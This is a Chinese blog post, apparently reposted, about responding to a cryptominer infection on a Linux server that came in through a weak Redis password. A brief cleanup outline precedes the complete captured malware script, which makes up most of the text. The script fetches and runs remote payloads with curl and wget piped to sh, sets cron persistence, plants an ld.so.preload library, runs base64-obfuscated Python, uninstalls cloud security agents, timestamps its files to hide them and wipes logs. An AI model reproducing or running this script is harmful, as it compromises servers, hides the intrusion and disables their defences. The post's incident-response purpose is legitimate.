常见的挖矿程序处理方式

这个是笔者前些天帮助朋友处理的挖矿的程序脚本，本次没有写具体处理方式,写的处理过程的思路和方法，如果你有好的方法可以一起分享学习，Thankyou！

1.服务器怎么会中挖矿木马程序

 肉鸡 弱口令 webshell xss 软件漏洞bug redis zk mysql 0day等造成服务器被扫描并且提权

2 首先遇到这样情况，我们杀掉挖矿的程序它会自己起来

  没清理干净 定时任务 命令修改  开机自启动文件 历史记录 

3.如何处理?

首先根据业务判定，造成业务故障,可选用HA方案切走应用服务，对服务器进行下架切断一切网络来源，进行相关处理

我一般处理方案是这样,首先通过iptables或者firewalls防火墙手段封死攻击者地址，类似与切断网络来源,接下来我们就可以进行分析和处理挖矿的原因

处理的方式 可以根据挖矿脚本进行分析 一个一个进行处理 对修改的命令和文件进行恢复和删除  

对系统和web进行安全测试，对系统漏洞进行修复.

4.原因分析

Redis存在弱口令导致的此次故障问题，Redis可以通过config配置方式 修改配置目录将自己的key放在服务器上，以达到服务器提权的目的

  1 #!/bin/bash
  2 SHELL=/bin/sh
  3 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
  4 
  5 function kills() {
  6 pkill -f sourplum
  7 pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
  8 rm -rf /tmp/qW3xT.2 /tmp/ddgs.3013 /tmp/ddgs.3012 /tmp/wnTKYg /tmp/2t3ik
  9 rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
 10 rm -rf /tmp/*index_bak*
 11 rm -rf /tmp/*httpd.conf*
 12 rm -rf /tmp/*httpd.conf
 13 rm -rf /tmp/a7b104c270
 14 ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
 15 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
 16 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
 17 ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9
 18 ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
 19 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
 20 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
 21 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
 22 ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
 23 ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
 24 ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9
 25 ps auxf|grep -v grep|grep "xmrigDaemon" | awk '{print $2}'|xargs kill -9
 26 ps auxf|grep -v grep|grep "xmrigMiner" | awk '{print $2}'|xargs kill -9
 27 ps auxf|grep -v grep|grep "/var/tmp/java" | awk '{print $2}'|xargs kill -9
 28 ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9
 29 ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9
 30 ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -9
 31 ps auxf|grep -v grep|grep "/var/tmp/sustes" | awk '{print $2}'|xargs kill -9
 32 pkill -f biosetjenkins
 33 pkill -f AnXqV.yam
 34 pkill -f xmrigDaemon
 35 pkill -f xmrigMiner
 36 pkill -f xmrig
 37 pkill -f Loopback
 38 pkill -f apaceha
 39 pkill -f cryptonight
 40 pkill -f stratum
 41 pkill -f mixnerdx
 42 pkill -f performedl
 43 pkill -f JnKihGjn
 44 pkill -f irqba2anc1
 45 pkill -f irqba5xnc1
 46 pkill -f irqbnc1
 47 pkill -f ir29xc1
 48 pkill -f conns
 49 pkill -f irqbalance
 50 pkill -f crypto-pool
 51 pkill -f minexmr
 52 pkill -f XJnRj
 53 pkill -f NXLAi
 54 pkill -f BI5zj
 55 pkill -f askdljlqw
 56 pkill -f minerd
 57 pkill -f minergate
 58 pkill -f Guard.sh
 59 pkill -f ysaydh
 60 pkill -f bonns
 61 pkill -f donns
 62 pkill -f kxjd
 63 pkill -f Duck.sh
 64 pkill -f bonn.sh
 65 pkill -f conn.sh
 66 pkill -f kworker34
 67 pkill -f kw.sh
 68 pkill -f pro.sh
 69 pkill -f polkitd
 70 pkill -f acpid
 71 pkill -f icb5o
 72 pkill -f nopxi
 73 pkill -f irqbalanc1
 74 pkill -f minerd
 75 pkill -f i586
 76 pkill -f gddr
 77 pkill -f mstxmr
 78 pkill -f ddg.2011
 79 pkill -f wnTKYg
 80 pkill -f deamon
 81 pkill -f disk_genius
 82 pkill -f sourplum
 83 pkill -f bashx
 84 pkill -f bashg
 85 pkill -f bashe
 86 pkill -f bashf
 87 pkill -f bashh
 88 pkill -f XbashY
 89 pkill -f libapache
 90 pkill -f qW3xT.2
 91 pkill -f /usr/bin/.sshd
 92 pkill -f sustes
 93 rm -rf /var/tmp/j*
 94 rm -rf /tmp/j*
 95 rm -rf /var/tmp/java
 96 rm -rf /tmp/java
 97 rm -rf /var/tmp/java2
 98 rm -rf /tmp/java2
 99 rm -rf /var/tmp/java*
100 rm -rf /tmp/java*
101 rm -rf /tmp/httpd.conf
102 rm -rf /tmp/conn
103 rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
104 rm -rf /tmp/conns
105 rm -f /tmp/irq.sh
106 rm -f /tmp/irqbalanc1
107 rm -f /tmp/irq
108 rm -rf /tmp/kworkerds /bin/kworkerds /bin/config.json /var/tmp/kworkerds /var/tmp/config.json /usr/local/lib/libjdk.so
109 rm -rf /tmp/.systemd-private-*
110 netstat -anp | grep 69.28.55.86:443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
111 netstat -anp | grep 185.71.65.238 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
112 netstat -anp | grep 140.82.52.87 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
113 netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
114 netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
115 netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
116 netstat -anp | grep :6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
117 netstat -anp | grep :7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
118 netstat -anp | grep :3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
119 netstat -anp | grep :14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
120 netstat -anp | grep :14433 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
121 netstat -anp | grep :13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
122 p=$(ps auxf|grep -v grep|grep kworkerds|wc -l)
123 if [ ${p} -eq 0 ];then
124     ps auxf|grep -v grep | awk '{if($3>=90.0) print $2}'| xargs kill -9
125     netstat -anp | grep :13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
126 fi
127 }
128 
129 function system() {
130     if [ ! -f "/bin/dns" ]; then
131         curl -fsSL https://pastebin.com/raw/KqzUfgz0 -o /bin/dns && chmod 755 /bin/dns
132         if [ ! -f "/bin/dns" ]; then
133             wget  https://pastebin.com/raw/KqzUfgz0 -O /bin/dns && chmod 755 /bin/dns
134         fi
135         if [ ! -f "/etc/crontab" ]; then
136             echo -e "0 1 * * * root dns" >> /etc/crontab
137         else
138             sed -i '$d' /etc/crontab && echo -e "0 1 * * * root dns" >> /etc/crontab
139         fi
140     fi
141 }
142 
143 function top() {
144     mkdir -p /usr/local/lib/
145     if [ ! -f "/usr/local/lib/libdns.so" ]; then
146         curl -fsSL https://monero.minerxmr.ru/1/1535595427x-1404817712.jpg -o /usr/local/lib/libdns.so && chmod 755 /usr/local/lib/libdns.so
147         if [ ! -f "/usr/local/lib/libdns.so" ]; then
148             wget https://monero.minerxmr.ru/1/1535595427x-1404817712.jpg -O /usr/local/lib/libdns.so && chmod 755 /usr/local/lib/libdns.so
149         fi
150     fi
151     if [ ! -f "/etc/ld.so.preload" ]; then
152             echo /usr/local/lib/libdns.so > /etc/ld.so.preload
153         else
154             sed -i '$d' /etc/ld.so.preload && echo /usr/local/lib/libdns.so >> /etc/ld.so.preload
155         fi
156     
157     touch -acmr /bin/sh /etc/ld.so.preload
158     touch -acmr /bin/sh /usr/local/lib/libdns.so
159 }
160 
161 function python() {
162     nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2VSa3JTUWZFJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
163     touch /tmp/.tmpp
164 }
165 
166 function echocron() {
167     echo -e "*/10 * * * * root (curl -fsSL https://pastebin.com/raw/cAfrnxHu||wget -q -O- https://pastebin.com/raw/cAfrnxHu)|sh\n##" > /etc/cron.d/root
168     echo -e "*/17 * * * * root (curl -fsSL https://pastebin.com/raw/cAfrnxHu||wget -q -O- https://pastebin.com/raw/cAfrnxHu)|sh\n##" > /etc/cron.d/apache
169     echo -e "*/23 * * * *    (curl -fsSL https://pastebin.com/raw/cAfrnxHu||wget -q -O- https://pastebin.com/raw/cAfrnxHu)|sh\n##" > /var/spool/cron/root
170     mkdir -p /var/spool/cron/crontabs
171     echo -e "*/31 * * * *    (curl -fsSL https://pastebin.com/raw/cAfrnxHu||wget -q -O- https://pastebin.com/raw/cAfrnxHu)|sh\n##" > /var/spool/cron/crontabs/root
172     mkdir -p /etc/cron.hourly
173     curl -fsSL https://pastebin.com/raw/cAfrnxHu -o /etc/cron.hourly/oanacroner && chmod 755 /etc/cron.hourly/oanacroner
174     if [ ! -f "/etc/cron.hourly/oanacroner" ]; then
175         wget https://pastebin.com/raw/cAfrnxHu -O /etc/cron.hourly/oanacroner && chmod 755 /etc/cron.hourly/oanacroner
176     fi
177     mkdir -p /etc/cron.daily
178     curl -fsSL https://pastebin.com/raw/cAfrnxHu -o /etc/cron.daily/oanacroner && chmod 755 /etc/cron.daily/oanacroner
179     if [ ! -f "/etc/cron.daily/oanacroner" ]; then
180         wget https://pastebin.com/raw/cAfrnxHu -O /etc/cron.daily/oanacroner && chmod 755 /etc/cron.daily/oanacroner
181     fi
182     mkdir -p /etc/cron.monthly
183     curl -fsSL https://pastebin.com/raw/cAfrnxHu -o /etc/cron.monthly/oanacroner && chmod 755 /etc/cron.monthly/oanacroner
184     if [ ! -f "/etc/cron.monthly/oanacroner" ]; then
185         wget https://pastebin.com/raw/cAfrnxHu -O /etc/cron.monthly/oanacroner && chmod 755 /etc/cron.monthly/oanacroner
186     fi
187     touch -acmr /bin/sh /var/spool/cron/root
188     touch -acmr /bin/sh /var/spool/cron/crontabs/root
189     touch -acmr /bin/sh /etc/cron.d/apache
190     touch -acmr /bin/sh /etc/cron.d/root
191     touch -acmr /bin/sh /etc/cron.hourly/oanacroner
192     touch -acmr /bin/sh /etc/cron.daily/oanacroner
193     touch -acmr /bin/sh /etc/cron.monthly/oanacroner
194 }
195 
196 function tables() {
197     iptables -I INPUT -p TCP --dport 6379 -j REJECT
198     iptables -I INPUT -s 127.0.0.1 -p tcp --dport 6379 -j ACCEPT
199     iptables-save
200     touch /tmp/.tables
201 }
202 
203 function uninstall() {
204     if ps aux | grep -i '[a]liyun'; then
205         wget http://update.aegis.aliyun.com/download/uninstall.sh
206         chmod +x uninstall.sh
207         ./uninstall.sh
208         wget http://update.aegis.aliyun.com/download/quartz_uninstall.sh
209         chmod +x quartz_uninstall.sh
210         ./quartz_uninstall.sh
211         rm -f uninstall.sh     quartz_uninstall.sh
212         pkill aliyun-service
213         rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
214         rm -rf /usr/local/aegis*;
215     elif ps aux | grep -i '[y]unjing'; then
216         /usr/local/qcloud/stargate/admin/uninstall.sh
217         /usr/local/qcloud/YunJing/uninst.sh
218         /usr/local/qcloud/monitor/barad/admin/uninstall.sh
219     fi
220     touch /tmp/.uninstall
221 }
222 
223 function downloadrun() {
224     ps=$(netstat -anp | grep 167.99.8 | wc -l)
225     if [ ${ps} -eq 0 ];then
226         if [ ! -f "/tmp/kworkerds" ]; then
227             curl -fsSL --connect-timeout 120 https://monero.minerxmr.ru/1/1538099276x-1404792622.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
228             if [ ! -f "/tmp/kworkerds" ]; then
229                 wget https://monero.minerxmr.ru/1/1538099276x-1404792622.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
230             fi
231                 nohup /tmp/kworkerds >/dev/null 2>&1 &
232         else
233             nohup /tmp/kworkerds >/dev/null 2>&1 &
234         fi
235     fi
236 }
237 
238 function downloadrunxm() {
239     mkdir -p /var/tmp
240     chmod 1777 /var/tmp
241     pm=$(netstat -anp | grep 167.99.8 | wc -l)
242     if [ ${pm} -eq 0 ];then
243         rm -rf /var/tmp/config.json*
244         curl -fsSL --connect-timeout 120 https://monero.minerxmr.ru/007/008/1534496022x-1404764583.jpg -o /var/tmp/config.json && chmod +x /var/tmp/config.json
245         if [ ! -f "/var/tmp/config.json" ]; then
246             wget https://monero.minerxmr.ru/007/008/1534496022x-1404764583.jpg -O /var/tmp/config.json && chmod +x /var/tmp/config.json
247         fi
248         ARCH=$(uname -i)
249         if [ "$ARCH" == "x86_64" ]; then
250             rm -rf /var/tmp/kworkerds*
251             curl -fsSL --connect-timeout 120 https://monero.minerxmr.ru/1/1537410304x-1404764882.jpg -o /var/tmp/kworkerds && chmod +x /var/tmp/kworkerds
252             if [ ! -f "/var/tmp/kworkerds" ]; then
253                 wget https://monero.minerxmr.ru/1/1537410304x-1404764882.jpg -O /bin/kworkerds && chmod +x /var/tmp/kworkerds
254             fi
255             nohup /var/tmp/kworkerds >/dev/null 2>&1 &
256         elif [ "$ARCH" == "i386" ]; then
257             rm -rf /var/tmp/kworkerds*
258             curl -fsSL --connect-timeout 120 https://monero.minerxmr.ru/1/1537410750x-1566657908.jpg -o /var/tmp/kworkerds && chmod +x /var/tmp/kworkerds
259             if [ ! -f "/var/tmp/kworkerds" ]; then
260                 wget https://monero.minerxmr.ru/1/1537410750x-1566657908.jpg -O /bin/kworkerds && chmod +x /var/tmp/kworkerds
261             fi
262             nohup /var/tmp/kworkerds >/dev/null 2>&1 &
263         else
264             rm -rf /var/tmp/kworkerds*
265             curl -fsSL --connect-timeout 120 https://monero.minerxmr.ru/1/1537410304x-1404764882.jpg -o /var/tmp/kworkerds && chmod +x /var/tmp/kworkerds
266             if [ ! -f "/var/tmp/kworkerds" ]; then
267                 wget https://monero.minerxmr.ru/1/1537410304x-1404764882.jpg -O /bin/kworkerds && chmod +x /var/tmp/kworkerds
268             fi
269             nohup /var/tmp/kworkerds >/dev/null 2>&1 &
270         fi
271     fi
272 }
273 
274 mkdir -p /tmp
275 chmod 1777 /tmp
276 update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/SGM25Vs3 )
277 if [ ${update}x = "update"x ];then
278     echocron
279 else
280     if [ ! -f "/tmp/.uninstall" ]; then
281         uninstall
282     fi
283     if [ ! -f "/tmp/.tables" ]; then
284         tables
285     fi
286     if [ ! -f "/tmp/.tmpu" ]; then
287         rm -rf /tmp/.tmpp
288         python
289     fi
290     kills
291     downloadrun
292     echocron
293     system
294     top
295     sleep 10
296     port=$(netstat -anp | grep 167.99.8 | wc -l)
297     if [ ${port} -eq 0 ];then
298         downloadrunxm
299     fi
300     echo 0>/var/spool/mail/root
301     echo 0>/var/log/wtmp
302     echo 0>/var/log/secure
303     echo 0>/var/log/cron
304     curl -sk https://2no.co/11Grb
305 fi
306 #

 

转载于:https://www.cnblogs.com/egrep/p/9721538.html